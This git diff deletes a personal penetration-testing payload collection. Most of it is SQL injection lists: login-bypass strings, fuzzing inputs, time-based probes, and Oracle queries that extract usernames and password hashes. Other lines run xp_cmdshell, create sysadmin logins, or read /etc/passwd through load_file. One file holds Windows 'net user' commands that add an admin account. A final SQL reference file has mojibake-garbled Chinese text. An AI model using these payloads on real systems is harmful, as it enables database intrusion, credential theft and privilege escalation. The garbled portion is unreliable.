diff --git a/payloads/README.MD b/payloads/README.MD deleted file mode 100644 index 19cfa34..0000000 --- a/payloads/README.MD +++ /dev/null @@ -1,3 +0,0 @@ -# those are some useful payloads collected by me when on penetration test -# here are two directions including sqli and xss -# in each direction, there are some payloads diff --git a/payloads/SQLi/admin''.txt b/payloads/SQLi/admin''.txt deleted file mode 100644 index 7f30bbf..0000000 --- a/payloads/SQLi/admin''.txt +++ /dev/null @@ -1,77 +0,0 @@ -'-' -' ' -'&' -'^' -'*' -' or ''-' -' or '' ' -' or ''&' -' or ''^' -' or ''*' -"-" -" " -"&" -"^" -"*" -" or ""-" -" or "" " -" or ""&" -" or ""^" -" or ""*" -or true-- -" or true-- -' or true-- -") or true-- -') or true-- -' or 'x'='x -') or ('x')=('x -')) or (('x'))=(('x -" or "x"="x -") or ("x")=("x -")) or (("x"))=(("x -or 1=1 -or 1=1-- -or 1=1# -or 1=1/* -admin' -- -admin' # -admin'/* -admin' or '1'='1 -admin' or '1'='1'-- -admin' or '1'='1'# -admin' or '1'='1'/* -admin'or 1=1 or ''=' -admin' or 1=1 -admin' or 1=1-- -admin' or 1=1# -admin' or 1=1/* -admin') or ('1'='1 -admin') or ('1'='1'-- -admin') or ('1'='1'# -admin') or ('1'='1'/* -admin') or '1'='1 -admin') or '1'='1'-- -admin') or '1'='1'# -admin') or '1'='1'/* -1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 -admin" -- -admin" # -admin"/* -admin" or "1"="1 -admin" or "1"="1"-- -admin" or "1"="1"# -admin" or "1"="1"/* -admin"or 1=1 or ""=" -admin" or 1=1 -admin" or 1=1-- -admin" or 1=1# -admin" or 1=1/* -admin") or ("1"="1 -admin") or ("1"="1"-- -admin") or ("1"="1"# -admin") or ("1"="1"/* -admin") or "1"="1 -admin") or "1"="1"-- -admin") or "1"="1"# -admin") or "1"="1"/* -1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 diff --git a/payloads/SQLi/sqli-detect.txt b/payloads/SQLi/sqli-detect.txt deleted file mode 100644 index f06d621..0000000 --- a/payloads/SQLi/sqli-detect.txt +++ /dev/null @@ -1,142 +0,0 @@ -'sqlvuln -'+sqlvuln -sqlvuln; -(sqlvuln) -a' or 1=1-- -"a"" or 1=1--" - or a = a -a' or 'a' = 'a -1 or 1=1 -a' waitfor delay '0:0:10'-- -1 waitfor delay '0:0:10'-- -declare @q nvarchar (4000) select @q = -0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A -0 -031003000270000 -declare @s varchar(22) select @s = -0x77616974666F722064656C61792027303A303A31302700 exec(@s) -0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) -declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e -exec(@s) -a' -? -' or 1=1 -‘ or 1=1 -- -x' AND userid IS NULL; -- -x' AND email IS NULL; -- -anything' OR 'x'='x -x' AND 1=(SELECT COUNT(*) FROM tabname); -- -x' AND members.email IS NULL; -- -x' OR full_name LIKE '%Bob% -23 OR 1=1 -'; exec master..xp_cmdshell 'ping 172.10.1.255'-- -' -'%20or%20''=' -'%20or%20'x'='x -%20or%20x=x -')%20or%20('x'='x -0 or 1=1 -' or 0=0 -- -" or 0=0 -- -or 0=0 -- -' or 0=0 # - or 0=0 #" -or 0=0 # -' or 1=1-- -" or 1=1-- -' or '1'='1'-- -' or 1 --' -or 1=1-- -or%201=1 -or%201=1 -- -' or 1=1 or ''=' - or 1=1 or ""= -' or a=a-- - or a=a -') or ('a'='a -) or (a=a -hi or a=a -hi or 1=1 --" -hi' or 1=1 -- -hi' or 'a'='a -hi') or ('a'='a -"hi"") or (""a""=""a" -'hi' or 'x'='x'; -@variable -,@variable -PRINT -PRINT @@variable -select -insert -as -or -procedure -limit -order by -asc -desc -delete -update -distinct -having -truncate -replace -like -handler -bfilename -' or username like '% -' or uname like '% -' or userid like '% -' or uid like '% -' or user like '% -exec xp -exec sp -'; exec master..xp_cmdshell -'; exec xp_regread -t'exec master..xp_cmdshell 'nslookup www.google.com'-- ---sp_password -\x27UNION SELECT -' UNION SELECT -' UNION ALL SELECT -' or (EXISTS) -' (select top 1 -'||UTL_HTTP.REQUEST -1;SELECT%20* -to_timestamp_tz -tz_offset -<>"'%;)(&+ -'%20or%201=1 -%27%20or%201=1 -%20$(sleep%2050) -%20'sleep%2050' -char%4039%41%2b%40SELECT -'%20OR -'sqlattempt1 -(sqlattempt2) -| -%7C -*| -%2A%7C -*(|(mail=*)) -%2A%28%7C%28mail%3D%2A%29%29 -*(|(objectclass=*)) -%2A%28%7C%28objectclass%3D%2A%29%29 -( -%28 -) -%29 -& -%26 -! -%21 -' or 1=1 or ''=' -' or ''=' -x' or 1=1 or 'x'='y -/ -// -//* -*/* -a' or 3=3-- -"a"" or 3=3--" -' or 3=3 -‘ or 3=3 -- diff --git a/payloads/SQLi/sqli-jbrofuzz.txt b/payloads/SQLi/sqli-jbrofuzz.txt deleted file mode 100644 index 27870aa..0000000 --- a/payloads/SQLi/sqli-jbrofuzz.txt +++ /dev/null @@ -1,167 +0,0 @@ -a -a' -a' -- -a' or 1=1; -- -@ -? -' and 1=0) union all -? or 1=1 -- -x' and userid is NULL; -- -x' and email is NULL; -- -anything' or 'x'='x -x' and 1=(select count(*) from tabname); -- -x' and members.email is NULL; -- -x' or full_name like '%bob% -23 or 1=1; -- -'; exec master..xp_cmdshell 'ping 172.10.1.255'-- -a -1 or 1=1 -1' or '1'='1 -1 and user_name() = 'dbo' -1 -1'1 -1 exec sp_ (or exec xp_) -1 and 1=1 -1' and 1=(select count(*) from tablenames); -- -1 -1 and user_name() = 'dbo' -\'; desc users; -- -1\'1 -1' and non_existant_table = '1 -' or username is not NULL or username = ' -1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116 -1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' -- -1 uni/**/on select all from where -’ or ‘1’=’1 -' or '1'='1 -'||utl_http.request('httP://192.168.1.1/')||' -' || myappadmin.adduser('admin', 'newpass') || ' -' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i -' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i -'||(elt(-3+5,bin(15),ord(10),hex(char(45)))) -||6 -'||'6 -(||6) -' or 1=1-- -or 1=1 -' or '1'='1 -; or '1'='1' -" or isNULL(1/0) /* -' or '7659'='7659 -" or isNULL(1/0) /* -' -- -' or 1=1-- -" or 1=1-- -' or 1=1 /* -or 1=1-- -' or 'a'='a -" or "a"="a -') or ('a'='a -admin' or ' -' select * from information_schema.tables-- -) union select * from information_schema.tables; -' having 1=1-- -' having 1=1-- -' group by userid having 1=1-- -' select name from syscolumns where id = (select id from sysobjects where name = tablename')-- -' or 1 in (select @@version)-- -' union all select @@version-- -' or 'unusual' = 'unusual' -' or 'something' = 'some'+'thing' -' or 'text' = n'text' -' or 'something' like 'some%' -' or 2 > 1 -' or 'text' > 't' -' or 'whatever' in ('whatever') -' or 2 between 1 and 3 -' or username like char(37); -' union select * from users where login = char(114,111,111,116); -' union select -password:*/=1-- -uni/**/on sel/**/ect -'; execute immediate 'sel' || 'ect us' || 'er' -'; exec ('sel' + 'ect us' + 'er') -'/**/or/**/1/**/=/**/1 -' or 1/* - or isNULL(1/0) /* -' or '7659'='7659 -" or isNULL(1/0) /* -' -- &password= -'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > -@var select @var as var into temp end -- -' and 1 in (select var from temp)-- -' union select 1,load_file('/etc/passwd'),1,1,1; -1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; -' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0)); -'; exec master..xp_cmdshell 'ping 10.10.1.2'-- -create user name identified by 'pass123' -create user name identified by pass123 temporary tablespace temp default tablespace users; -' ; drop table temp -- -exec sp_addlogin 'name' , 'password' -exec sp_addsrvrolemember 'name' , 'sysadmin' -insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -grant connect to name; grant resource to name; -insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) -' or 1=1 -- -' union (select @@version) -- -' union (select NULL, (select @@version)) -- -' union (select NULL, NULL, (select @@version)) -- -' union (select NULL, NULL, NULL, (select @@version)) -- -' union (select NULL, NULL, NULL, NULL, (select @@version)) -- -' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- -'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' -- -'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' -- -'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' -- -'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' -- -'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' -- -'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- -'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' -- -'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' -- \ No newline at end of file diff --git a/payloads/SQLi/sqli-owasp.txt b/payloads/SQLi/sqli-owasp.txt deleted file mode 100644 index 1b810e3..0000000 --- a/payloads/SQLi/sqli-owasp.txt +++ /dev/null @@ -1,142 +0,0 @@ -'sqlvuln -'+sqlvuln -sqlvuln; -(sqlvuln) -a' or 1=1-- -"a"" or 1=1--" - or a = a -a' or 'a' = 'a -1 or 1=1 -a' waitfor delay '0:0:10'-- -1 waitfor delay '0:0:10'-- -declare @q nvarchar (4000) select @q = -0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A -0 -031003000270000 -declare @s varchar(22) select @s = -0x77616974666F722064656C61792027303A303A31302700 exec(@s) -0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) -declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e -exec(@s) -a' -? -' or 1=1 -‘ or 1=1 -- -x' AND userid IS NULL; -- -x' AND email IS NULL; -- -anything' OR 'x'='x -x' AND 1=(SELECT COUNT(*) FROM tabname); -- -x' AND members.email IS NULL; -- -x' OR full_name LIKE '%Bob% -23 OR 1=1 -'; exec master..xp_cmdshell 'ping 172.10.1.255'-- -' -'%20or%20''=' -'%20or%20'x'='x -%20or%20x=x -')%20or%20('x'='x -0 or 1=1 -' or 0=0 -- -" or 0=0 -- -or 0=0 -- -' or 0=0 # - or 0=0 #" -or 0=0 # -' or 1=1-- -" or 1=1-- -' or '1'='1'-- -' or 1 --' -or 1=1-- -or%201=1 -or%201=1 -- -' or 1=1 or ''=' - or 1=1 or ""= -' or a=a-- - or a=a -') or ('a'='a -) or (a=a -hi or a=a -hi or 1=1 --" -hi' or 1=1 -- -hi' or 'a'='a -hi') or ('a'='a -"hi"") or (""a""=""a" -'hi' or 'x'='x'; -@variable -,@variable -PRINT -PRINT @@variable -select -insert -as -or -procedure -limit -order by -asc -desc -delete -update -distinct -having -truncate -replace -like -handler -bfilename -' or username like '% -' or uname like '% -' or userid like '% -' or uid like '% -' or user like '% -exec xp -exec sp -'; exec master..xp_cmdshell -'; exec xp_regread -t'exec master..xp_cmdshell 'nslookup www.google.com'-- ---sp_password -\x27UNION SELECT -' UNION SELECT -' UNION ALL SELECT -' or (EXISTS) -' (select top 1 -'||UTL_HTTP.REQUEST -1;SELECT%20* -to_timestamp_tz -tz_offset -<>"'%;)(&+ -'%20or%201=1 -%27%20or%201=1 -%20$(sleep%2050) -%20'sleep%2050' -char%4039%41%2b%40SELECT -'%20OR -'sqlattempt1 -(sqlattempt2) -| -%7C -*| -%2A%7C -*(|(mail=*)) -%2A%28%7C%28mail%3D%2A%29%29 -*(|(objectclass=*)) -%2A%28%7C%28objectclass%3D%2A%29%29 -( -%28 -) -%29 -& -%26 -! -%21 -' or 1=1 or ''=' -' or ''=' -x' or 1=1 or 'x'='y -/ -// -//* -*/* -a' or 3=3-- -"a"" or 3=3--" -' or 3=3 -‘ or 3=3 -- \ No newline at end of file diff --git a/payloads/SQLi/sqlifuzzer.txt b/payloads/SQLi/sqlifuzzer.txt deleted file mode 100644 index 9b0e43a..0000000 --- a/payloads/SQLi/sqlifuzzer.txt +++ /dev/null @@ -1,86 +0,0 @@ -2 and 456=678 -2 or 345=345 -2 order by 9999 -2 order by 1 -2/0 and 456=678 -2/1 or 345=345 -2/*f*/and/*f*/456=678 -2/*f*/or/*f*/345=345 -a' and '456'='678 -a' or '345'='345 -a' and 'fghi'='fghj'-- # -a' or 'dfth'='dfth'-- # -a' order by 9999-- # -a' order by 1-- # -a'and/*g*/456=678-- # -a'or/*g*/345=345-- # -a' and '456'='678 -a' or '345'='345 -a' and 'fghi'='fghj'# -a' or 'dfth'='dfth'# -a' order by 9999# -a' order by 1# -a'||/**/456=678# -a'||/**/345=345# -a' and '456'='678 -a' or '345'='345 -a' and 'fghi'='fghj'-- -a' or 'dfth'='dfth'-- -a' order by 9999-- -a' order by 1-- -a'and/*d*/456=678-- -a'or/*d*/345=345-- -a' and '456'='678 -a' or '345'='345 -a' and 'fghi'='fghj'-- # -a' or 'dfth'='dfth'-- # -a' order by 9999-- # -a' order by 1-- # -a'and/*g*/456=678-- # -a'or/*g*/345=345-- # -345'%5d|//*|/a%5b'a -456'%5d|//a|/a%5b'a -345')%5d|//*|/a%5bcontains(a,'b -456')%5d|//a|/a%5bcontains(a,'b -a" and "456"="678 -a" or "345"="345 -a" and "fghi"="fghj"-- # -a" or "dfth"="dfth"-- # -a" order by 9999-- # -a" order by 1-- # -a"and/*g*/456=678-- # -a"or/*g*/345=345-- # -345"%5d|//*|/a%5b"a -456"%5d|//a|/a%5b"a -345")%5d|//*|/a%5bcontains(a,"b -456")%5d|//a|/a%5bcontains(a,"b -1 waitfor delay '0:0:X'-- -1; waitfor delay '0:0:X'-- -1'; waitfor delay '0:0:X'-- -1); waitfor delay '0:0:X'-- -1)); waitfor delay '0:0:X'-- -1'); waitfor delay '0:0:X'-- -1')); waitfor delay '0:0:X'-- -1 or benchmark(100000000,MD5(1))# -1' or benchmark(100000000,MD5(1))# -1) or benchmark(100000000,MD5(1))# -1') or benchmark(100000000,MD5(1))# -1)) or benchmark(100000000,MD5(1))# -1')) or benchmark(100000000,MD5(1))# -1/(select UTL_INADDR.get_host_address('n0where329.z0m') from dual)-- -1' AND 1=UTL_INADDR.get_host_address('n0where329.z0m')-- -1 waitfor delay '0:0:X'-- -1; waitfor delay '0:0:X'-- -1'; waitfor delay '0:0:X'-- -1); waitfor delay '0:0:X'-- -1)); waitfor delay '0:0:X'-- -1'); waitfor delay '0:0:X'-- -1')); waitfor delay '0:0:X'-- -1 or benchmark(100000000,MD5(1))# -1' or benchmark(100000000,MD5(1))# -1) or benchmark(100000000,MD5(1))# -1') or benchmark(100000000,MD5(1))# -1)) or benchmark(100000000,MD5(1))# -1')) or benchmark(100000000,MD5(1))# -1/(select UTL_INADDR.get_host_address('n0where329.z0m') from dual)-- -1' AND 1=UTL_INADDR.get_host_address('n0where329.z0m')-- diff --git a/payloads/SQLi/添加系统用户.txt b/payloads/SQLi/添加系统用户.txt deleted file mode 100644 index 17d9cb4..0000000 --- a/payloads/SQLi/添加系统用户.txt +++ /dev/null @@ -1,5 +0,0 @@ -net user #гϵͳѴڵû -net user root ym2011 /add #һû -net user administrators /add #ûȨԱ -net user #ȷѳɹû -net user root # ȷûȨ diff --git a/payloads/SQLi/经典SQL语句.txt b/payloads/SQLi/经典SQL语句.txt deleted file mode 100644 index 315f90e..0000000 --- a/payloads/SQLi/经典SQL语句.txt +++ /dev/null @@ -1,738 +0,0 @@ -һ - -1˵ݿ -CREATE DATABASE database-name -2˵ɾݿ -drop database dbname -3˵sql server ---- ݵ device -USE master -EXEC sp_addumpdevice 'disk', 'testBack', 'c:\mssql7backup\MyNwind_1.dat' ---- ʼ -BACKUP DATABASE pubs TO testBack -4˵± -create table tabname(col1 type1 [not null] [primary key],col2 type2 [not null],..) - -еı± -Acreate table tab_new like tab_old (ʹþɱ±) -Bcreate table tab_new as select col1,col2 from tab_old definition only -5˵ɾ± -drop table tabname -6˵һ -Alter table tabname add column col type -עӺ󽫲ɾDB2мϺҲܸı䣬Ψһܸıvarchar͵ijȡ -7˵ Alter table tabname add primary key(col) -˵ɾ Alter table tabname drop primary key(col) -8˵create [unique] index idxname on tabname(col.) -ɾdrop index idxname -עDzɸĵģıɾ½ -9˵ͼcreate view viewname as select statement -ɾͼdrop view viewname -10˵򵥵Ļsql -ѡselect * from table1 where Χ -룺insert into table1(field1,field2) values(value1,value2) -ɾdelete from table1 where Χ -£update table1 set field1=value1 where Χ -ңselect * from table1 where field1 like %value1% ---like﷨ܾ! -select * from table1 order by field1,field2 [desc] -select count as totalcount from table1 -ͣselect sum(field1) as sumvalue from table1 -ƽselect avg(field1) as avgvalue from table1 -select max(field1) as maxvalue from table1 -Сselect min(field1) as minvalue from table1 -11˵߼ѯ -A UNION -UNION ͨ TABLE1 TABLE2ȥκظжһ ALL UNION һʹʱ UNION ALLظС£ÿһв TABLE1 TABLE2 -B EXCEPT -EXCEPTͨ TABLE1 е TABLE2 евظжһ ALL EXCEPT һʹʱ (EXCEPT ALL)ظС -C INTERSECT -INTERSECTֻͨ TABLE1 TABLE2 жевظжһ ALL INTERSECT һʹʱ (INTERSECT ALL)ظС -עʹʵļѯбһµġ -12˵ʹ -Aleft outer join -ӣӣӱƥУҲӱС -SQL: select a.a, a.b, a.c, b.c, b.d, b.f from a LEFT OUT JOIN b ON a.a = b.c -Bright outer join: -()ȰӱƥУҲӱС -Cfull/cross outer join -ȫӣӱƥУӱем¼ -12:Group by: - һűһ ɺ󣬲ѯֻܵõصϢ - صϢͳϢ count,sum,max,min,avg ı׼) - SQLServerзʱtext,ntext,image͵ֶΪ - selecteͳƺеֶΣֶܺͨηһ - -13ݿв - ݿ⣺ sp_detach_db;ݿ⣺sp_attach_db ӱҪ· -14.޸ݿ: -sp_renamedb 'old_name', 'new_name' - - -1˵Ʊ(ֻƽṹ,Դa ±b) (Access) -һselect * into b from a where 1<>1SQlServer -select top 0 * into b from a -2˵(,Դa Ŀb) (Access) -insert into b(a, b, c) select d,e,f from b; - -3˵ݿ֮Ŀ(ʹþ·) (Access) -insert into b(a, b, c) select d,e,f from b in ݿ⡯ where -ӣ..from b in '"&Server.MapPath(".")&"\data.mdb" &"' where.. - -4˵Ӳѯ(1a 2b) -select a,b,c from a where a IN (select d from b ) : select a,b,c from a where a IN (1,2,3) - -5˵ʾ¡ύ˺ظʱ -select a.title,a.username,b.adddate from table a,(select max(adddate) adddate from table where table.title=a.title) b - -6˵Ӳѯ(1a 2b) -select a.a, a.b, a.c, b.c, b.d, b.f from a LEFT OUT JOIN b ON a.a = b.c - -7˵ͼѯ(1a ) -select * from (SELECT a,b,c FROM a) T where t.a > 1; - -8˵between÷,betweenƲѯݷΧʱ˱ֵ߽,not between -select * from table1 where time between time1 and time2 -select a,b,c, from table1 where a not between ֵ1 and ֵ2 - -9˵in ʹ÷ -select * from table1 where a [not] in (ֵ1,ֵ2,ֵ4,ֵ6) - -10˵ŹɾѾڸûеϢ -delete from table1 where not exists ( select * from table2 where table1.field1=table2.field1 ) - -11˵ı⣺ -select * from a left inner join b on a.a=b.b right inner join c on a.a=c.c inner join d on a.a=d.d where ..... - -12˵ճ̰ǰ -SQL: select * from ճ̰ where datediff('minute',fʼʱ,getdate())>5 - -13˵һsql 㶨ݿҳ -select top 10 b.* from (select top 20 ֶ,ֶ from order by ֶ desc) a, b where b.ֶ = a.ֶ order by a.ֶ -ʵ֣ -ݿҳ - - declare @start int,@end int - - @sql nvarchar(600) - - set @sql=select top+str(@end-@start+1)++from T where rid not in(select top+str(@str-1)+Rid from T where Rid>-1) - - exec sp_executesql @sql - - -ע⣺topֱӸһʵӦֻĽĴRidΪһʶУtopоֶΣǷdzкôġΪԱ topֶ߼ģѯĽʵʱеIJһ£߼епܺݱеIJһ£ѯʱȲѯ 